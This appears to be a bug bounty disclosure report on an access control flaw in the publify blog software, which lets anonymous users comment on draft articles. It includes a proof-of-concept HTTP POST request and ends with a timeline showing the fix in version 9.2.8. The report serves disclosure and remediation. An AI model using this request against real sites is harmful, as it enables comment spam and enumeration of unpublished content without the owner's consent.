Improper Access Control in publify/publify


Reported on

Feb 10th 2022


Article in draft mode can only be accessed by admins who have permission to manage article. Anonymous users can't view but can leave comments on article in draft mode. The cause of the vulnerability is that the draft article is setting to comment enabled and create_comment function only checks for comment enabled/disabled, not whether check for article in draft or public mode.

Proof of Concept

  • Step 1: Login demo account in Create article in draft mode and get the id.
  • Step 2: Visit website in anonymous mode, get cookie and CSRF token. Call this request with id of article in draft mode.
POST /comments?article_id=3281 HTTP/1.1
Cookie: _publify_blog_session=c908f541644f3d97dbf90e4ef273253b
Content-Length: 130
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Csrf-Token: WHlz0364OOQtQuoHCuYkYeqBcxSgcp4xxj+gdu+z4dWXkwGhtLqZZgvy2j0YiQ1G+CJFiRdl3GlbO5w5ZxLkOg==
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  • Step 3: In browser of demo account, go to, you can see comment in unpublish article.
  • PoC:

Unpublish article:

Create comment:


Anonymous users can leave comments on articles in draft mode. Attacker can also take advantage of the vulnerability to list the id of articles in draft mode. Run comment spam attack even if the app has disabled comments for all public articles.

We are processing your report and will contact the publify team within 24 hours. 2 years ago
nhiephon modified the report
2 years ago
We have contacted a member of the publify team and are waiting to hear back 2 years ago
Matijs van Zuijlen validated this vulnerability 2 years ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the publify team. We will try again in 7 days. 2 years ago
We have sent a second fix follow up to the publify team. We will try again in 10 days. 2 years ago
We have sent a third and final fix follow up to the publify team. This report is now considered stale. 2 years ago
2 years ago


A fix has been prepared.

Matijs van Zuijlen marked this as fixed in 9.2.8 with commit 0e6c66 2 years ago
Matijs van Zuijlen has been awarded the fix bounty
to join this conversation